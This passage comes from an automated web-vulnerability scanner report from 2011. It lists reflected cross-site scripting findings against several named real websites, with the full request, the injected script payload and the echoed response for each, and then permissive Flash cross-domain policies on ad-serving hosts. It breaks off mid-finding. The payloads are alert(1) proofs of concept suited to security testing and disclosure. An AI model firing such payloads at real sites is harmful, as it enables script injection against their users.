ETag: "3e44fe57bd9f1ca7ae2413ad405470b5"
Cache-Control: no-cache
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+he7kp7sk7c48bgofxgtgaayor1ghp%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A41.415141+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A41.415143+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:41 GMT
Set-Cookie: vrid=e7021120-3f54-012e-d795-00237da0b95e; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:41 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlMDU2NjM2ZjQwZTU5NzkxM2ZmODBhZDg1OTkwOWNhYTM6E2RleF9zZXNzaW9uX2lkSSIpZTcwMzkwNjAtM2Y1NC0wMTJlLWQ3OTYtMDAyMzdkYTBiOTVlBjoGRUY%3D--9e7ac88334df5357779cb76d6b268bfc634f7ddf; path=/; HttpOnly
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-e6a5db50-3f54-012e-19bb-00237da0b95e
Expires: Sat, 02 Apr 2011 12:44:40 GMT
Content-Length: 322976

<!DOCTYPE html>
<html>
<head>

<title>C496d<Img Src=A Onerror=Alert(1)>63985e825a0 - YP.COM</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="C496d&lt;Img Sr
...[SNIP]...
<h3 class="title">C496d<Img Src=A Onerror=Alert(1)>63985e825a0 Near You</h3>
...[SNIP]...

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb5b"><script>alert(1)</script>8beaa66c83f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:58:33 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 13:58:33 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/favicon.icobbb5b"><script>alert(1)</script>8beaa66c83f" />
...[SNIP]...

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /contact-us/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b99b"><script>alert(1)</script>ca9c0d3513d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /contact-us/ HTTP/1.1
Host: www.kcom.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=986389016; __utmz=90957184.1301752662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1301749027; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utma=90957184.848604376.1301752662.1301752662.1301752662.1; __utmc=90957184; __utmb=90957184.3.9.1301752673281

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1301749251; expires=Sun, 01-Apr-2012 14:00:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 14:00:51 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="Content-t
...[SNIP]...
<input type="hidden" id="00N300000055kEx" name="00N300000055kEx" title="Web-to-lead URL" value="KCOM Site - http://www.google.com/search?hl=en&q=4b99b"><script>alert(1)</script>ca9c0d3513d - ">
...[SNIP]...

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.canada.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1d63'%3ba353fa99bdc was submitted in the REST URL parameter 1. This input was echoed as f1d63';a353fa99bdc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /f1d63'%3ba353fa99bdc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.canada.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.canada.com/f1d63';a353fa99bdc/index.html
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 13:41:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:41:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 3579

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.canada.com/f1d63';a353fa99bdc/index.html">here</a>.</h2>
</body></html>
<form name="frmPage" method="po
...[SNIP]...
-
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName='/canada/www.canada.com/f1d63';a353fa99bdc/index.html';
s.server=window.location.hostname.toLowerCase();
s.channel='Canada';
s.pageType='';
s.p
...[SNIP]...

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 was submitted in the REST URL parameter 1. This input was echoed as 49add"style="x:expression(alert(1))"0c2a6539db2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico49add"style%3d"x%3aexpression(alert(1))"0c2a6539db2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX1832OFBpGXmYZEphWmxtBesEf7vWbDUBZQ49XYidYzK4w%3d%3d:iczp3haayzcooqqmcz
...[SNIP]...
<A HREF="http://multiply.com/favicon.ico49add"style="x:expression(alert(1))"0c2a6539db2">
...[SNIP]...

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff3a1<script>alert(1)</script>1f3e33e8e25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmczt3pjm; domain=multiply.com; path=/
Set-Cookie: session=1301751465:1301751465:1301751465:1::; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: initial_anon_referrer=; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 1245

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: uid=A:1:U2FsdGVkX18sHkOwl6s9LDVYxCCmwXWdqKgJOM5Lx-aN.bAm4s-ZzA%3d%3d:0bp8odaayycooqqmcz
...[SNIP]...
res=Tuesday, 29-Jul-2014 23:12:40 GMT
Set-Cookie: session=1301751465::1301751465:1::0; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.icoff3a1<script>alert(1)</script>1f3e33e8e25
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multiply.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f694<script>alert(1)</script>3af9c4679e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.multiply.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa TAIa PSAa PSDa OUR NOR PHY UNI COM DEM PRE"
Expires: Wed, 13 Apr 2005 10:02:00 GMT
Pragma: no-cache
Cache-Control: max-age=0
Content-Type: text/html; charset=utf-8
X-Cache: MISS from multiply.com
Connection: close
Content-Length: 757

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache/1.3.29 (Unix) mod_perl/1.29
Set-Cookie: language=en; domain=multiply.com; path=/; expires=Tuesday, 29-Jul-2014 23:12:40 GMT
Location: http://multiply.com/favicon.ico?1f694<script>alert(1)</script>3af9c4679e8=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
...[SNIP]...

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c6c"><script>alert(1)</script>c18b021cdc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?91c6c"><script>alert(1)</script>c18b021cdc1=1">
...[SNIP]...

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shop.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 5a1e2><script>alert(1)</script>0856dee6b4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 13:41:31 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?5a1e2><script>alert(1)</script>0856dee6b4d=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 9fa44><script>alert(1)</script>ab167bca6cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 349
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?9fa44><script>alert(1)</script>ab167bca6cd=1">
</head>
<body><h1>Object Moved</h1>This docume
...[SNIP]...

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopcompanion.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd1a5"><script>alert(1)</script>df47f8a83f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shopcompanion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 URL Redirect
Server: AMOS/1.0
Date: Sat, 02 Apr 2011 14:00:40 GMT
Content-Type: text/html
Content-Length: 351
Location: http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache

<html><head><title>Document Moved</title>
<META URL=http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
</head>
<body><h1>Object Moved</h1>This docum
...[SNIP]...
<a href="http://edge.shop.com/ccimg.shop.com/web/favicon.ico?bd1a5"><script>alert(1)</script>df47f8a83f9=1">
...[SNIP]...

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3412a<script>alert(1)</script>af689436fa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?3412a<script>alert(1)</script>af689436fa3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 249

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1">http://townhall.com/favicon.ico?3412a<script>alert(1)</script>af689436fa3=1</a>
...[SNIP]...

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39dc7"><script>alert(1)</script>63b1fa46103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 14:05:57 GMT
Location: http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?39dc7"><script>alert(1)</script>63b1fa46103=1">http://townhall.com/favicon.ico?39dc7"><sc
...[SNIP]...

7. Flash cross-domain policy  previous  next
There are 550 instances of this issue:


7.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:31:36 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 37531
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.3. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 11:30:43 GMT
Expires: Thu, 31 Mar 2011 11:30:14 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5168
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.4. http://smp.adviva.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /crossdomain.xml

Issue detail

